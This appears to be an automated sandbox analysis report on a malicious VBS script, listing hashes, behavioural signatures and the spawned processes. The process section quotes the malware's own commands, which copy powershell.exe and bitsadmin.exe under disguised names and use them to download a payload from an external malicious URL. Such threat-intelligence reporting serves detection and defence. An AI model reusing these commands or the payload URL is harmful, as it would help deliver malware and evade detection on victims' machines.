Analysis
- max time kernel: 86s
- max time network: 158s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 20-05-2022 15:02

Static task: static1
Behavioral task: behavioral1
Sample: FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs
Resource: win7-20220414-en
General
- Target: FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs
- Size: 3KB
- MD5: ba1697038db097aae963962a1fd5dd15
- SHA1: 46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
- SHA256: 79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
- SHA512: d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  pid   Process
  1716  DrBqNtd.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                    Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation  WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of WriteProcessMemory (7 IoCs)
  description                       pid   Process      procid_target
  PID 1912 wrote to memory of 3484  1912  WScript.exe  79
  PID 1912 wrote to memory of 3484  1912  WScript.exe  79
  PID 1912 wrote to memory of 3656  1912  WScript.exe  81
  PID 1912 wrote to memory of 3656  1912  WScript.exe  81
  PID 1912 wrote to memory of 1716  1912  WScript.exe  83
  PID 1912 wrote to memory of 1716  1912  WScript.exe  83
  PID 1912 wrote to memory of 1716  1912  WScript.exe  83
Processes
- C:\Windows\System32\WScript.exe (PID: 1912)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369\FattDiffEmessa2020 03799870369.vbs"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID: 3484)
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
  - C:\Windows\System32\cmd.exe (PID: 3656)
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
  - C:\Users\Admin\AppData\Roaming\DrBqNtd.exe (PID: 1716)
    Command line: "C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
    Signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 182KB
  MD5: f57a03fa0e654b393bb078d1c60695f3
  SHA1: 1ced6636bd2462c0f1b64775e1981d22ae57af0b
  SHA256: c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
  SHA512: 7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a